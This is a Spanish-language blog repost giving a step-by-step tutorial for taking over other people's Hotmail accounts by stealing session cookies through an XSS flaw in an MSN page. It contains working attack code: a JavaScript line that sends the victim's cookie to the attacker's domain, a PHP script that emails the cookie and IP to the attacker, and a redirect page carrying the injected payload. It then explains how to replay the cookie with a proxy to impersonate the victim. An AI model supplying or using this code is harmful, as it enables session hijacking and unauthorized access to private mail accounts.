ACTUALIZACIÓN: parece ser que Microsoft ha corregido finalmente la vulnerabilidad. Sin embargo esto no invalida totalmente el tutorial, ya que a la que vuelva a aparecer otra página vulnerable a ataques XSS - y posiblemente aparecerá - simplemente tendremos que modificar el paso 4.

Como prometí hace unos días, voy a colgar un paso a paso de cómo obtener acceso a cuentas de Hotmail de otros usuarios a través del robo de la cookie, posible gracias a hecho de que existe una vulnerabilidad sobre la cual leí hace ya tres semanas en Full Disclosure de insecure.org Full Disclosure rss feed y a día de hoy, 6 de septiembre, sigue sin estar solucionada.

Este paso a paso está basado tanto en esa información como en un tutorial acerca de una vulnerabilidad similar detectada el año pasado,

Eso sí, tened en cuento que si bien lo que voy explicar no constituye un delito, el entrar en la cuenta de correo de otra persona sí que lo es – o al menos creo. Tened también en cuenta que esto tampoco sirve para recuperar la contraseña de una cuenta de Hotmail. Lo único que hacemos es apropiarnos de la cookie de un usuario que ya está identificado en Hotmail y hacernos pasar por él. Por último, recordad que la cookie sólo será válida durante unas cuantas horas – 8 como máximo según mi experiencia -, y que para poder realizar todo el proceso necesitaremos algún dominio que pueda ejecutar scripts de servidor (PHP en el caso de este tutorial).

Una vez aclarados esos puntos, pasamos al tutorial:

   1. Creamos una cuenta en Hotmail sobre la que hacer las pruebas.
   2. Creamos el fichero javascript cookie.js, sustituyendo www.tudominio.com por la ruta donde alojes los scripts.

      location.href='http://www.tudominio.com/cookie.php?cookie='+escape(document.cookie)

      Este script lo único que hace es llamar a una página PHP que se encargará de guardar la cookie.
   3. Creamos el fichero cookie.php, sustituyendo nombre@correo.com por el tu propio correo al que enviarás la cookie, y http://www.otrodominio.com por la URL de un dominio cualquiera, que será a donde será redirigido al usuario una vez haya finalizado el proceso.

      <?
      $cookie = $_GET['cookie'];
      $ip = getenv("REMOTE_ADDR");
      $msg = "Cookie: $cookie\nIP Address: $ip";
      $subject = "cookie";
      mail("nombre@correo.com", $subject, $msg);
      header ("location: http://www.otrodominio.com");
      ?>

   4. Creamos un fichero pagina.html, que será la página que deberá cargar el usuario para iniciar el proceso. Evidentemente, podemos cambiar el nombre del fichero, para hacerlo más apetecible para el que tiene que hacer clic.

      <meta http-equiv="refresh" content="0; url=http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://www.tudominio.com/cookie.js>">

      En el código hay que sustituir www.tudominio.com por el nombre de dominio donde hayas alojado los otros dos fichero cookie.php y cookie.js. La página únicamente se encarga de redirigir al usuario a la página de Microsoft vulnerable al ataque http://newsletters.msn.com/xs-v3/insite.asp, que a su vez y debido a la inyección del script en la URL redirige el usuario a nuestra página cookie.js, que llama a cookie.php que recoge la cookie y la envía a nuestro correo.
   5. Ahora sólo tienes que enviarte un correo electrónico a la cuenta de Hotmail que hemos creado en el paso 1, con un enlace a la página http://www.tudominio.com/pagina.html, y hacer clic una vez llegue el correo. En breves instantes recibiréis un correo en la dirección que hemos puesto en el fichero cookie.php, con la cookie de usuario y la IP.

   6. Una vez hemos conseguido la cookie es el momento de usarla para hacernos pasar por ese usuario. Para ella nada mejor que un programa como Proxomitron.
   7. Bajamos el programa, lo ejecutamos, y en la primera ventana dejamos marcado solamente Outgoin Header Filters y pulsamos el botón Headers

   8. En la siguiente ventana desmarcamos todas las opciones a excepción de la casilla out de Cookie: Fake a cookie (out), seleccionamos la opción y pulsamos Edit.

   9. Ahora sólo tenemos que introducir la cookie recibida en la casilla Replacement text, pulsar Ok, pulsar Apply. A partir de este momento, tenemos configurado el programa para que ante cualquier petición de página, envíe esa cookie.

  10. Ahora tenemos que configurar el navegador para que utilice a Proxomitron como proxy. Para el tutorial he utilizado IE, evitando así tocar configuraciones de mi navegador habitual, Opera. Vamos a Herramientas – Opciones de Internet – Conexiones – Configuración de Lan… - marcar utilizar un servidor Proxy y poner en Dirección 127.0.0.1 y en Puerto 8080. A partir de ahora todas las páginas que carguemos desde el IE pasarán por Proxomitron, que únicamente enviará la cookie que hemos configurado.

  11. Cargamos la página http://my.msn.com y si estamos en la página personal de la cuenta creada en el paso 1, solo tenemos que pulsar en el enlace a Hotmail y entrar en el correo. Si no, basta con recargar la página para asegurarnos de que la cookie se ha escrito.
---------
FUENTE SACADA DE :
http://blog.kibara.com/
saludos